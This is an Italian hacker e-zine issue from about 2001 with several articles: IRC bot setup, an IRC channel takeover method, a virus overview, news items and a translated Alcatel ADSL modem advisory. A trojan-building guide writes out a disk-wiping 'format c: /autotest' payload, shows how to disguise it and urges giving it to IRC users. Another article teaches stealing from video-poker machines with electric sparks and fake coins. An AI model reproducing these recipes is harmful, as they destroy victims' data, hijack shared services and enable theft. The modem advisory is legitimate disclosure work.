moneta è?) »http://www.shellnow.it««««««««««««««««« $ 20.00 »»»»» »http://www.falco.com««««««««««««««««««« $ 10.00 »»»»» »http://www.jeah.net«««««««««««««««««««« $ 12.00 »»»»» »http://www.reverse.net««««««««««««««««« $ 10.00 »»»»» »http://www.vtshell.com««««««««««««««««« $ 20.00 »»»»» »http://www.theshell.com«««««««««««««««« $ 10.00 »»»»» »http://www.lomag.net««««««««««««««««««« $ 8.00 »»»»» ×××××××××××××××××××××××××××××××××××××××××××××××××××××× Una volta ottenuta una shell decente (in un modo più o meno legale;), non vi rimane ke installare il bot seguendo i seguenti passi... 1. collegatevi tramite telnet (avvio-->segui--> "telnet indirizzo") al server, accedete alla vostra shell; 2. scompattate il bot (prendiamo kome esempio l'Eggdrop) col seguente comando: gunzip nome_eggdrop.tar.gz tar xf nome_eggdrop.tar (dove nome_eggdrop è il nome del file contenente il bot) 3. cancellate ora il formato tar col comando: rm nome_eggdrop.tar 4. ora entrate nella directory in cui avete installato l'eggdrop: cd nome_eggdrop 5. ora non ci rimane ke configurare il nostro bot, per fare questo usate il seguente comando: ./configure ora aspettiamo un po... se la shell può ospitare il bot non avremo problemi... usate ora il comando "make"; ora possiamo cominciare a costruire il file di configurazione che definirà il nick del bot, i servers che userà e tutti gli altri parametri necessari al suo funzionamento {SETTAGGIO BOT:} i kommenti saranno evidenziati dal simbolo "#" #definiamo l'amministratore del bot set admin "vostronick" #diamo un nick al nostro pikkolo... :) set nick "CookBot" #settiamo l'Ident del bot set username "nomebot" #decidiamo che nickname userà il bot nel kaso ke il su nick principale #sia okkupato set altnick "CookB0t2" #settiamo il "real name" set realname " Underground Magazine! umcrew.tsx.org " #definiamo i servers che verranno usati dal bot set servers { irc.tin.it } #decidiamo un canale in cui potremo trovare sempre il bot set confchan "#umcrew" Questi erano i settaggi principali.... ora possiamo avviare il nostro bot: ./cartella_eggdrop -m cookbot.conf cartella_eggdrop è il nome della cartella in cui risiede il bot, mentre il file cookbot.conf è il file di configurazione. Bene! Tra poki minuti, se tutto è stato fatto correttamente, il nostro bot sarà in IRC e a noi non resterà ke farci identificare usando il seguente comando da IRC: /msg NickBot hello A questo punto il Bot ci kiederà di settare una password e noi risponderemo kosì: /msg NickBot pass tuapassword Ora ABBIAMO IL NOSTRO BOT! :o)) ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _|_ __ |__, ___ __ ___ __ |_, (__( | \ (__/_ (__) (__| (__/_ | ' ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: TakeOVERiamo un CANLE IRC] [Autore: FeltonSpray] "DiScLaImEr" Ragazzi io non mi assumo nessuna responsabilità sull'uso che ne farete di questo artikolo, se usate quanto scritto per rompere le balle in IRC siete solo LAMER io ho scritto questo testo per farvi capire come si fà un TAKE OVER non per stimolarvi a farli quindi .... InIzIaMo Per usare queste tecniche come sempre avrete bisogno di LINUX il mio amore!!!! e di due tool facilmente reperibili su qualsiasi sito che tratta l'Hacking! allora: MCB: Tool che ci permette con un nick collision di far espellere un op dal canale dai BOT! =) Link Looker: Tool che ci informa quando un server sta per Splittare naturalmente se siete nuovi di irc o non sapete che significa splittare lasciate perdere questo artikolo NON FA' PER VOI! Facciamo un pò di Teoria: Il take over è un'atto di impadronimento di una room di IRC, spesso questi attacchi vengono fatti in room con persone poco competenti infatti e difficile in una room più seria che ciò avvenghi visto la presenza di almeno una decina di bot! cmq la room #hacker e quasi sempre takkata =) hehe, premetto che i bot se sono settati bene e viaggiano su linee veloci sarà una cosa complicata buttarli giù e sopratutto nei server dove esiste anche il grado di OWNER (irc.msn.com) da op normali non potete fare un DEOP agli OWNER ma qui ci sono io a spiegarvi un pò qualcosa: Mettete in "MOTO" il link looker e guardate l'andamento del server preso di mira, lui vi informa appena il server sta per andare in Split e voi ricollegandovi subito sarete automaticamente @ =) ma purtroppo esistono i bot che proteggono i canali più seri ed allora scende in gioco MCB che creandovi un clone di un operatore in caso di split al ritorno i bot trovano 2 nick uguali e li butta fuori per NICK COLLISION e voi ritornate nella room e sarete op e potete deoppare i bot e restare li magari settando il canale PRIVATO CON PASS =) e non + di 4 utenti cioè voi ed almeno 3 bot vostri =) così da non far mai più utilizzare la room =) Naturalmente in caso di server che riconosce il grado OWNER non potrete deoppare i bot naturalmente settati come owner (+q)! Spero di essere stato chiaro per tutti anche sè non capite fa lo stesso manco io ci ho capito niente ma l'importante che funziona! Prima di lasciarvi vi dò una kikka che forse alcuni conoscono ed altri no: Vi è mai capitato su irc di trovare persone sempre connesse in gni momento della giornata?? I casi sono due ho è figlio di un dirigente TELECOZ =) oppure usa un IRC BOUNCER, questo irc bouncer installato su una vostra shell permette di restare on-line anche quando siete of-line e tutte le query vengono tranquillamente loggate e viste al momento del ritorno on-line! ciao a tutti a presto..... []---[FeLtOnSpRaY]---[] >>--> feltonspray@katamail.com <--<< _______________________________ | _ _ _ _____ _ _ | || | / / | | | _ \ | | | | | || | / / | | | |_| | | | | | | || | / / | | | _ / | | | | | || |/ / | | | | \ \ | | | | | ||___/ |_| |_| \_\ |_| |_| | ------------------------------- ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ o __ __ o __ |_ __ __ __ __ __ _|_ o __ o (__| | | ' (__(_ __) | | ) | (__) | ' | ) ) (__( |_, | (___ | ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: alcuni tipi di virus] [AUTORE: Jrash] Salve sono il vostro amico Jrash (N.d.R. ci conosciamo? °_°), in questo articolo vorrei parlarvi dei virus, tutti sapete cosa cono ma io vi parlero di loro in modo approfondito, dicendovi i danni che possono provocare e una sorta di loro struttura. Buona lettura!!! Esistono essenzialmente tre famiglie di virus che poi si dividono in tanti altri sottogruppi, esaminiamo prima le grandi famiglie: Worms Trojan Virus Iniziero' col parlarvi dei Worms e poi mi addentrero' nella descrizione dei virus veri e propri dal momento che richiede piu' tempo ed e' una faccenda un po' piu' complessa. Worms Il primo Worm fu creato intorno agli anni '80 da Robert Morris, un giovane che ebbe la brillante idea di creare un virus non dannoso, ma che si riproduceva via Internet, ebbene si, usava un bug indovinate di quale programma? Ovviamente del Sendmail, molti computer andarono in tilt per l'immane riproduzione del verme, in pratica a quel tempo tutti avevano almeno 10-12 vermi in casa, anche i non pescatori ;)))) Su Internet si puo' trovare facilmente il codice sorgente del vermone, ho sentito dire che e' stato inserito un errore nel codice per non farlo compilare, se e' vero non lo so. Tutt'oggi non esistono vermi noti poiche' con le nuove versioni del sendmail sono stati corretti i bug che ne permettevano la proliferazione, oggi questo ignobile programma e' perfetto quasi al 100% l'unico problema (di importanza praticamente nulla) e' che possiamo ottenere il "root" su un sistema di rete semplicemente mandando una mail ;))) Si sa che questi programmatori tolgono un bug e ne creano 20, bho!!! Anche se non ve ne freghera' assolutamente nulla, vi dico che ho uno zio Italiano ma che vive in Finlandia che contribuisce tuttora allo sviluppo di Linux e del software ad essi necessario, quindi guai a parlar male dei loro prodotti ;))) Dicevamo che vermi noti non ce ne sono, pero' con l'avvento di Linux credo che questo fenomeno crescera'. Trojan I trojan, o meglio Trojan Horse (cavalli di Troia) sono stati (a quanto ne so') la prima forma di virus esistente, dovrebbero essere stati creati la prima volta in Russia da un team di programmatori, i trojan sono dei programmi che non hanno alcuna intenzione di duplicarsi ma servono solo a fare danni in un computer, anche le bombe logiche sono dei trojan, solo che si attivano in un determinato periodo. Un ottimo esempio di trojan e' il NetBus o il Back Orifice, ma anche noi possiamo creare un trojan facendo un file batch, scrivendoci dentro: format c: /autotest e convertendolo con il Bat2Com. Se poi lo vogliamo rendere invisibile bastera' criptarlo a compattarlo (petite.exe, pklite.exe ecc..). Il nome cavallo di Troia e' dato dal fatto che vengono spesso diffusi come altri programmi. Virus I virus si differiscono dai Trojan per il fatto che tendono a restare nascosti ed a riprodursi il piu' possibile. Windows e' un virus ??? Nooo Win non e' un virus. Questo e' cio' che fanno i virus...: Si replicano velocemente.. O.K. Win fa' questo come i Virus..... Il virus usa tutte le risorse di sistema, rallentando il sistema come ultimo. Percio' O.k. Win fa cio'. Un virus di tanto in tanto riduce in spazzatura il tuo HD, O.K. anche Win lo fa. I virus sono di norma portati all'insaputa dell'utente in tutti i programmi principali..... Sigh!!! Anche Win lo fa. Un virus fa venire il sospetto di esserci poiche' il sistema diventa troppo lento... e fa venire la voglia di comperare nuovo Hardware. Oddio vale anche per Win. Sino ad ora tutto fa sembrare che Win sia un virus.... ma ci sono alcune differenze fondamentali: I virus sono ben supportati dall'autore, Funzionano su ogni tipo di sistema... il loro codice programma e' estremamente veloce, compatto ed efficiente, e tendono a diventare sempre piu' sofisticati con l'andare della loro evoluzione.... Percio' Windows [ NON ] e' un virus.... Ok andiamo ora ad esaminare i vari tipi di viruz: Sector (Master Boot Record / Floppy Boot Record): Questo tipo di virus e' stato uno dei primi, attaccano il settore di avvio degli H.D.D. oppure dei floppy, per togliere questi virus, spesso basta scrivere al prompt del DOS: fdsik /mbr questo comando ripulisce il Master Boot Record, non utilizzatelo assolutamente se avete installato un Boot Loader (lilo, loadlin, syslinux, boot manager ecc..) altrimenti verra' cancellato. Questi viruz erano dannosi una volta quando avevamo bisogno del "disco di supplemento" per avviare il dos, oggi non fanno quasi piu' nulla a meno che non accendiamo il pc con un dischetto infetto dentro e nel BIOS abbiamo settato l'opzione che cerca un floppy all'avvio, se ci sono queste condizioni allora sono kazzi. Macro Virus di nuova concezione scritti in Visual Basic, possono essere inseriti nelle macro del lotus, word e di altri programmi, se apriamo il file senza avviare la macro non succede nulla, ma se non lo facciamo rischiamo di riportare danni (si parte dalla semplice impossibilita' di salvare un documento alla formattazione del disco duro). I macro virus sono sempre di piu', ma per sconfiggerli basta solo non attivare le macro ;)))) File Questi si dividono in Residenti e Non-Residenti: Residenti: Una volta avviato il programma sul quale era ospite rimane attivo per sempre. Non-Residente: Smette di funzionate quando viene chiuso il programma ospite. Questo tipo di viruz una volta avviato apre a caso dei file e copia dentro di loro la routine di infezione (i virus hanno questo nome proprio perche' si comportano come quelli esistenti in natura, cioe', entrano in una cellula (il file) attaccano il loro DNA (la routine di infezione) al DNA della cellula (il codice del programma) la cellula continua a funzionare normalmente solo che altera qualche sua funzione e poi muore per lisi (esplosione)) MultiPartito Questi si comportano sia come i Sector virus (o boot virus) sia come i File viruz, in pratica si attaccano come le piattole al boot e quando vengono caricati attaccano i vari altri file del sistema, i floppy, gli eseguibili del dos ecc..Un esempio e' sicuramente il mitico Junkie.1027 Cluster (File System viruses) Secondo me questi sono i tipi di viruz piu' "belli", questi modificano la tabella dei contenuti sull'Hard Disk in modo da far avviare prima il virus e poi il software. Come sempre saluto i miei amici, e in paricolare KeWl, A[v]a[t]A[r], ghent, Norman_B e la stupenda Giada.......lol ByEzZ............alla proxima.......CiAuZz... 02/04/2001 = = = = = = = = = = = = h t t p : / / u m c r e w . t s x . o r g = = = = = = = = = = =[Jrash]° ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ ___ __ __ ___ _|_ __ __ | __ __ __ (___ | ' (__/_ (__( | ' (__/_ |_, | ' (__) (__, (__( | ) __) ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: GUIDA ALLA CREAZIONE DEI TROJAN] [Autore: Jrash^^] [Crew : UMc's member] [E-mail: jrash@hackersat.com] [URL : www.hackersat.com - http://umcrew.tsx.org] Salve ragazzi, in questo articolo vorrei parlarvi dei trojan e in particolare cosa sono e addirittura come crearne uno...che vi posso dire?? una sola cosa : Buona lettura!!!! I Trojan sono una serie di istruzioni che vengono fatte eseguire dalla vittima inconsapevolmente. Talvolta possono formattare l'hard disk o altri scritti in linguaggio C che, messi opportunamente su un server, possono mandarvi via e-mail tutti i login e le password degli utenti. Se avrete bravura con il Linguaggio C, con un po' di fantasia, riuscirete a crearne uno per ogni esigenza. Se non conoscete il linguaggio C non scoraggiatevi si possono creare in qualsiasi modo(Nota By Cookboker: non solo in C! esiste anke Delphi, dio can!;). Nei file batch, in visual basic, in Pascal, etc. Per crearne uno cosi' potete fare ciò: 1) Create un file BAT con le istruzioni che vorrete far essere eseguite sul computer vittima 2) Procuratevi l'utility BAT2COM che serve a trasformare un file BAT in COM 3) Rinominate un file mettendoci un nome credibile 4) Per rendere il tutto ancora più realistico create un file vuoto di qualche kb. Come? In questo modo: andate in dos e scrivete: DEBUG NOME -F 100,F000,0 -RCX :EA60 -W -Q si creerà un file di 60 kb con il nome di NOME. Ora utilizzate l'opzione: copy /b file.com+nome cheneso.com dove file.com sarà il file con i comandi, nome sarà il file che abbiamo creato con debug mentre cheneso.com sarà il file finale che vorrete creare. 5) Prima di zippare il tutto create un file di testo dove fate finta di spiegare cosa c'è nel file com oppure se siete abili con l'ascii potrete far finta che il file è stato scaricato da una BBS. 6) Zippate il tutto. Ora è venuto il momento di decidere a chi affibbiare questo file. L'unica cosa che vorrei dirvi è che non dovrete usarlo contro persone normali perchè pensate che una cosa del genere può capitare anche a voi. Andate su irc e prendete di mira quei canali dove ci sono solo degli stupidi lamers che tentano di nukkare ognuno. Ditegli se vorrà un programma che manda nuke che fanno suicidiare il modem o qualcosa del genere. Alla vostra proposta non potrà rifiutare e lo accetterà. Sapete che emozione vederlo cadere da Irc perchè quello che si dovrà suicidiare non sarà il modem ma lui! N.B.Cook: Se non avete BAT2COM non c'è nessun problema: lo trovate negli allegati! ;) Pensate che una volta ne ho creato uno che quando veniva avviato si bloccava e dava un errore ma in realta sostituiva un'altro file all'autoexec.bat. Quando il poveretto riavviava il computer si vedeva prima una bella scritta di insulti e trovava l'hard disk formattato. Ma come, quando si scrive format dopo non bisogna dare la conferma? Si è vero ma nonna Microsoft ha incluso l'opzione /autotest che formatta l'hard disk senza chiedere la conferma. Bello eh? Dunque usai il comando: Format c: /autotest /q /u che equivale a una formattazione incondizionata ed anche veloce. Mi raccomando usateli senza spregiudizi, usateli contro coloro che fanno i maligni!!!ihihih!! Ci sentiamo...al prossimo articolo...ByEzZ....... __________________________________________ | _____ _____ _ _ _____ _____ | | / _ \ |_ _| | | | | | ____| | _ \ | | | | | | | | | |_| | | |__ | |_| | | | | | | | | | | _ | | __| | _ / | | | |_| | | | | | | | | |___ | | \ \ | | \_____/ |_| |_| |_| |_____| |_| \_\ | ------------------------------------------ ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× |\| |¯ \ \/ / ¯/ | | |¯ \/\/ /_ ¯ ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [ HALLO ] Si kiamo "Hallo" (il virus :P) e si sta diffondendo grazie ad MSN Messenger inviandosi ai componenti della rubrica della vittima. Il worm è stato realizzato in VB 5 e usa kome oggetto "i have a file for u. its real funny" ("ho un file per te. E' veramente divertente"). Questo worm si può diffondere soltanto nei pc aventi installato MSN Messenger di MiCro$oft (Microsoft è il male ;o)). [ Modem ADSL Alcatel bucato ] Dopo le akkuse di Shimomura (sarà skritto giusto? :)), famoso per aver avuto un ruolo kiave nella cattura di Mitnick (as Condor), il CERT afferma ke i modem ADSL di Alcatel sono affetti da numerosi bug, facilmente sfruttabili da kome avete potuto notare leggendo l'artikolo di Cujo. [ 50.000 $ a ki riesce a violare un sistema ] Secure Computing ha "bandito" un konkorso ke konsiste nel crackare un sistema difeso dai firewall dell'azienda, e questa volta non lo si fa solo per lo skopo di dimostrare la propria superiorità ma lo si fa per più di 100 milioni di lire. :)) [ Bucato ADDR.com ] Sono stati sottratti più di 46 mila account kontenenti dati kome: Nome, Cognome e carta di credito! A quanto pare i numeri delle karte di kredito vengono già usati illecitamente. ··························································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ __ |__, o __ ___ _|_ _|_ ___ __| __ __ __ |__, ___ __ | ) ) (__( | \ | | ) (__/_ |_, |_, (__/_ (__| (__( |__) (__) | \ (__/_ | ' ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: come fregare la macchinette dei poker del bar] [Autore: FeltonSpray] [ DISCLAIMER ] Ragazzi se mettete in pratica quanto scritto rischiate anche una denuncia per furto quindi occhio a ciò che fate e non rompete i coglioni a me e ditelo anche ai vostri legali che io non ESISTO! =) [ INIZIAMO ] Ieri come al solito ero alla sala giochi xxxxx xxxx xxxxxx con i miei amici mentre notavo che un mio amiko ("NALDI" HIHIH)mi spiegava un giochetto (non sessuale ;p) quindi scappiamo al Tabacchino a comprarci un accendino ma quello con la scintilla elettrica non quello con le pietrina (insomma quello a scatto) datogli £ 2.000 :-( ci siamo messi ed abbiamo rotto l'accendino per prendere solo la parte dove tu scatti e fa la scintilla elettrica. Adesso corriamo come pazzi ed arrivamo alla sala giochi e cominciamo a mandare scariche elettriche sui giochi ma solo in uno ci riuscimmo (ricordate usate solo quelli che danno tiket) dopo provato a mandare cariche in diverse parti (non erogene ;p) un bellissimo suono di tilt si scatenò e magicamente cominciarono ad uscire tiket a valanga quasi subito spegnemmo il gioco per arrestarne l'uscita, il tilt lo abbiamo fatto scatenare sulle viti del vetro, da provare dove escono i ticket per bene!!! e dopo una mezzoretta che ci siamo scambiati 10 karte in gettoni, tornammo con la nostra bella lista di tiket e gli abbiamo detto che avevamo fatto pocherissimo a 10 pezzi (450.000 £) infatti gli portammo tot tiket ed abbiamo guadagnato 225.000 £ a testa. Stamattina il gioco non c'era +, lo avevano cambiato (chissa come mai). Adesso andiamo in un'altra sala giochi non contenti del guadagno, dopo una mezzora di occhiate in giro, sperimentiamo sto coso e un'altra situazione ci sconvolse, dopo trovato il punto magico, la macchina non ci diede tiket ma ci caricò il massimo dei crediti (provate a pensare quanto!!!) ci siamo messi a giocare ma eravamo troppo sospetti, giocammo per un pò, ci scaricammo 100.000 a testa e gli lasciammo una marea di crediti, beato chi se li gode intanto noi in 2 giorni ci siamo fatti 325.000, adesso andremo in altre salagiochi vedremo che succede..... se mi arrestano venite a farmi visita :-) (Screeny me le porti le sigarette?? :p) ASCOLTATE CERCATE SEMPRE VIDEOPOKER A TIKET MA DI MODELLI VECCHI CON I NUOVI NON CI SIAMO RIUSCITI, OCCHIO AL RESPONSABILE DELLA SALA SE VI BECCA VI SCASSA DI BASTONATE, VEDETE CHE SE VI DENUNCIANO PASSATE I GUAI PER FURTO, CERCATE SALA GIOCHI LONTANE DA DOVE FREQUENTATE, NON FATE COME NOI CHE ADESSO NON POSSIAMO RIENTRARCI PIU' :-( E CMQ IO NON SONO RESPONSABILE DI CIO CHE FARETE!!!! ... Tempo dopo, sempre con NALDI, abbiamo notato che la parte dove inserite i gettoni subisce spesso una rottura, in pratica non riesce a distinguere bene il valore del pesoe della grandezza delle monete quindi usate sempre macchine vecchiotte cambiatevi una banconata da mille in 20 * 50 £ e sperimentate se li prendono, cmq non mollate fateli 10 tentativi per macchina, noi ne abbiamo trovate un paio e con 5.000 pensate quanti crediti ci carichiamo =) eheh non so se funziano con tutti ma di sikuro con le vecchie avrete più possibilità. Ho notato anche che i padroni delle salagiochi (almeno quella che frequento) lascia le chiavi dei vari giochi dentro un gioco e conserva solo una chiave!!! Quindi cercate di forzare in qualche modo il gioco se ci riuscite SIETE RICCHI!! Pensate in quanti giocano hai poker in un giorno mettete che ci sono 20 poker ($$$$$$$$$ =). Beh ragazzi bisogna solo sperimentare tutto qui cmq ricordatevi: ASCOLTATE CERCATE SEMPRE VIDEOPOKER A TIKET MA DI MODELLI VECCHI CON I NUOVI NON CI SIAMO RIUSCITI, OCCHIO AL RESPONSABILE DELLA SALA SE VI BECCA VI SCASSA DI BASTONATE, VEDETE CHE SE VI DENUNCIANO PASSATE I GUAI PER FURTO, CERCATE SALA GIOCHI LONTANE DA DOVE FREQUENTATE, NON FATE COME NOI CHE ADESSO NON POSSIAMO RIENTRARCI PIU' :-( E CMQ IO NON SONO RESPONSABILE DI CIO CHE FARETE!!!! CIAO A TUTTI DA []---[FeLtOnSpRaY]---[] >>--> feltonspray@katamail.com <--<< P.S. Se troviamo altri sistemi vi terrò informati e faremo il 3 TXT sui furti ai video poker =) ··························································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ __ __| ___ __ __ __ __| __ | __ | __ __ _|_ ___ | | ) ) (__) (__| (__/_ | ) ) (__( (__| __) |_, (__( |_, (___ (__( |_, (__/_ |_, ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Modem ADSL Alcatel, backdoor?] [Tradotto da: Cujo] Oggetto: vulnerabilità multiple nel modem ADSL Alcatel I. Sommario Ricerche in collaborazione con il San Diego Super Computer Center dell' Università della California,San Diego, hanno rilevato diverse estensioni nel modem ADSL Speed Touch Alcatel ( attualmente un router/bridge ADSL-Ethernet ). Queste estensioni permettono ad un attacker di prendere il completo controllo del dispositivo,cambiare la configurazione,aggiornare firmware,e manipolare la connessione tra la centrale telefonica del provider e il dispositivo. Queste estensioni permettono le seguenti azioni: * cambiare la configurazione del dispositivo, come renderlo inaccessibile. * disabilitare il dispositivo,sia temporaneamente che permanentemente ( richiede la riparazione da parte del costruttore ) * installazione di codice,come network sniffer per controllare il traffico locale LAN e rendere il dispositivo facilmente accessibile dall'esterno. Una delle scoperte più interessanti è stata una backdoor a risposta crittografica che bypassa completamente una qualsiasi password che un utente può aver settato nel dispositivo. Tutti i test sono stati eseguiti in modalità bridge LLC/SNAP.Non è stato testata la modalità router,il che non esclude che ci siano altre estensioni facilemte exploitabili in questo modo. (Speed Touch è un marchio registrato di Alcatel) II. I dispositivi Alcatel Speed Touch Questo advisory interessa la famiglia di dispositivi Speed Touch e similari apparentemente basati sul codice come i vecchi Alcatel 1000 ADSL Network Temination device (1000 ADSL). Tutti i test sono stati effettuati sullo "Speed Touch Home" e solo alcuno sul 1000 ADSL.E' probabile che il software nello "Speed Touch Pro" sia molto simile a quello nello Speed Touch Home, dunque è probabile che anche il Pro sia vulnerabile a questo tipo di attacchi.Anche altri software derivati dallo stesso codice potrebbero avere in comune le stesse vulnerabilità. Le estensioni decritte sono state dimostrate in tutte le versioni firmware dello Speed Touch Home,comprese: KHDSAA.108 Jul 6 14:03:12 GMT 1999 KHDSAA.132 Nov 19 13:52:05 GMT 1999 KHDSBA.133 Mar 16 17:52:08 GMT 2000 KHDSAA.134 Apr 24 12:48:43 GMT 2000 L'alcatel 1000 ADSL non ha passwords settabili e dunque non ha in comune la back door crittografica con lo Speed Touch Home. Ha una vulnerabilità in più per il quale non può essere ristretto il suo accesso HTTP e condivide la vulnerabilità TFTP descritta più avanti con lo Speed Touch Home. La versione del software del 1000 ADSL era la seguente: KA1HAA.112 Jan 26 09:51:00 GMT 1999 Per default,il dispositivo usa come indirizzo ip 10.0.0.138,che può essere cambiato via HTTP,FTP o linea di comando (TELNET).Il dispositivo può avere più indirizzi ip contemporaneamente. III. Le estensioni implementate Ci sono diverse estensioni,incluse quelle per l'autenticazione;servers FTP totalmente accessbili, e una mancanza di firmware autenticati o scaricati. III.A Varie caratteristiche del sistema di autenticazione dell'utente Il dispositivo ha diverse estensioni e una "feature" interessante nell'area dell' autenticazione. III.A.1 Porta principale aperta - Nessuna password di default Il dispositivo permette l'accesso read/write alla configurazione senza bisogno di password.Questo può essere fatto via FTP o TELNET.La struttura dei file system dei dispositivi può essere esaminata via FTP. http://www.vnunet.fr/actu/article.htm?numero=6197&date=2000-11-06 III.A.2 La password può essere rubata/cambiata La password,se settata, può essere estratta dal dispositivo via TFTP.Oppure TFPT può venir usato per cambiare la password esistente.Nessuna di queste operazione richiede alcun tipo di autenticazione ( :D N.d.T. ). Vedere (III.B) per l'uso di TFTP. III.A.3 Back door crittografica - bypassare completamente la password Se per qualche motivo non è conviente ottenere o cambiare la password con TFPT, può essere direttamente bypassata accedendo come "EXPERT",che invocherà una sequenza in risposta crittografica.La password sarà il risultato della funzione crittografica applicata alla stringa presentata immediatamente prima la richiesta della password.Per esempio,l'output FTP e TELNET appaiono simili a questi: ftp> open 10.0.0.138 Connected to 10.0.0.138. 220 Inactivity timer = 120 seconds. Use 'site idle ' to change. Name (10.0.0.138:root): EXPERT 331 SpeedTouch (00-90-D0-00-00-00) User EXPERT OK. Password required. Password: 230 OK ftp> telnet> open 10.0.0.138 Trying 10.0.0.138... Connected to 10.0.0.138. Escape character is '^]'. User : EXPERT SpeedTouch (00-90-D0-00-00-00) Password : ##########------------------------------------------------------------------------ * * ______ * ___/_____/\ * / /\\ ALCATEL ADSL MODEM * _____/__ / \\ * _/ /\_____/___ \ Version 3.2 * // / \ /\ \ * _______//_______/ \ / _\/______ Copyright 1999-2000. * / / \ \ / / / /\ * __/ / \ \ / / / / _\__ * / / / \_______\/ / / / / /\ * /_/______/___________________/ /________/ /___/ \ * \ \ \ ___________ \ \ \ \ \ / * \_\ \ / /\ \ \ \ \___\/ * \ \/ / \ \ \ \ / * \_____/ / \ \ \________\/ * /__________/ \ \ / * \ _____ \ /_____\/ * \ / /\ \ / * /____/ \ \ / * \ \ /___\/ * \____\/ * ----------------------------------------------------------------------- => In tutti e due i casi sopracitati,la stringa è 'SpeedTouch (00-90-D0-00-00-00)' e la risposta, (tipicamente un integer a 10 cifre) in questo caso è 1552815226. Ogni dispositivo avrà un unica risposta come ha diversi indirizzi MAC,e il resto della stringa cambia talvolta tra le diverse versioni del firmware.Ne' l'algoritmo di crittazione,ne le variabili crittografiche sono stave viste cambiare tra le diverse versioni dei dispositivi o del software. Il rischio più grande di questo sistema di risposta cifrato è che chiunque conosca l'algoritmo crittografico e le variabili usate per validare la risposta ha accesso permanente a QUALSIASI dispositivo Alcatel Speed Touch e similari. Al momento non c'è nessun modo conosciuto per disabilitare questa back door,tranne che scaricare il nostro firmware personalizzato (vedi III.C) III.B Aprire servers TFTP - via LAN, WAN e DSLAM Il server TFTP può essere banalmente accessito dalla LAN "interna", e l'accesso dall' "esterno" può essere solo relativamente difficile.Sembrerebbe possibile accedere al DSLAM del provider ADSL,senza bisogno di ulteriori autenticazioni. Il dispositivo fornisce un server TFTP aperto che può essere usato per trasferire files dal e al dispositivo.Questo può essere usato per estrarre la configurazione del dispositivo o per cambiarla e,volendo,distruggere o modificare il firmware.Per esempio,un attacker, potrebbe sostituire il firmware con un codice malizioso,come un packet sniffer o un denial of service "zombie" come il Trin00 o il TFN2K. Non c'è modo di disattivare per l'utente/propietario il server TFTP. Non c'è,ovviamente, richiesta di autenticazione per alcun accesso TFPT. III.B.1 Accesso via la LAN interna Specificatamente, il server TFTP è disponibile sopra il normale UDP/IP nella rete Ethernet interna,usando un client TFTP.Usando TFTP,si potrebbe estrarre la password e altri dati di configurazione, così come la copia del firmware. Molto più importante, si potrebbe aggiornare la configurazione,inclusa una nuova (o nessuna) password,così come un firmware modificato "maliziosamente". III.B.2 Accesso via la WAN esterna (IP) E' possibile attaccare dalla WAN esterna via i protocolli IP usando uno dei tanti metodi conosciuti per fare un "bounce" dei pacchetti UDP attraverso un host della rete interna. Questo attacco può essere fatto senza problemi con l' indirizzo IP del dispositivo Speed Touch,come il default 10.0.0.138, o con l'indirizzo assrgnato allo Speed Touch dalla rete interna. In questo modo risulta banale l'attacco attraverso, (ad esempio), un ECHO UDP. In questo esempio, si può mandare pacchetti al server TFTP dall'esterno mandando pacchetti UDP TFTP con un indirizzo d'origine di 255.255.255.255 e una porta d'origine qualsiasi che abbia una funzione di UDP ECHO.Quando l' "ECHO srver" replica a questa richiesta, interpreterà l'indirizzo 255.255.255.255 come il broadcast locale,e il pacchetto verrà mandato alla rete Ethernet con la porta settata come TFTP UDP. Molti dispositivi di rete (incluso lo Speed Touch) forniscono un servizio ECHO UDP, e in molti casi (anche in quello dello Speed Touch),non c'è modo di disattivare questo servizio. Dovrebbe essere notato che lo Speed Touch Home non processa i pacchetti source-routed da default. Tuttavia, questa opzione fornisce diverse possibilità ad un attacker.Se l'attacker ha solo accesso TFTP, (attraverso un bounce o altri metodi), potrebbe scrivere una nuova configurazione per il dispositivo che permetta il source-routing e permetta pieno accesso anche settando una nuova password o usando una back door crittografica III.B.3 Accesso via la WAN esterna (DSLAM) Lo Speed Touch sembra abbia i servers TFTP e SNMP in ascolto direttamente sulla WAN esterna su AAL5-encapsulated VPI/VCIs 15/16 e 15/64. Questa caratteristica probabilmente esiste per fare in modo che il provider abbia pieno accesso al dispositivo,senza alcuna forma di autenticazione. III.C Errata autenticazione del firmware Il dispositivo Alcatel sembra che non abbia nessun controllo dell'autenticità del firmware scaricato nello stesso. Questa funzione rende più facile generare un firmware che venga accettato e upgradato.Questo firmware potrebbe contenere codice malizioso come un netword sniffer o un denial of service. IV. Non c'è nessun firewall nel A1000 o nell' Home,il che rende questi modems non sicuri da usare? Assolutamente,no.Con la configurazione standard questi modems non permettono nessuna connessione dall'esterno verso il computer dell'utente,se non quando richiesto dalla macchina stessa.Questo significa che permette solamente i reply alla richiesta dell'utente.Tutti gli altri tentativi verrebbero bloccati. V. Commenti e osservazioni E' rimarchevole che per ogni metodo di accesso al dispositivo fornito (HTTP,TELNET,FTP e TFTP) sia possibile bypassare qualsiasi controllo che il propietario abbia messo in atto. Un firmware modificato maliziosamente potrebbe portare un worm o un virus,fino ad un host della rete Ethernet interna. VI. Alcune note sulla modalità "EXPERT" Lo Speed Touch Home ha una modalità EXPERT che può essere usata per scoprire interessanti informazioni sui parametri della linea ADSL,le statistiche della ATM, etc. Questa modalità può essere anche per settare una grande varietà di parametri sul dispositivo e l'interfaccia,come il partizionare,formattare e cancellare il file system flash. L'accesso a questa modalità è protetta dallo stesso sitema crittografico usato come back door per bypassare la password. VII. Risorse 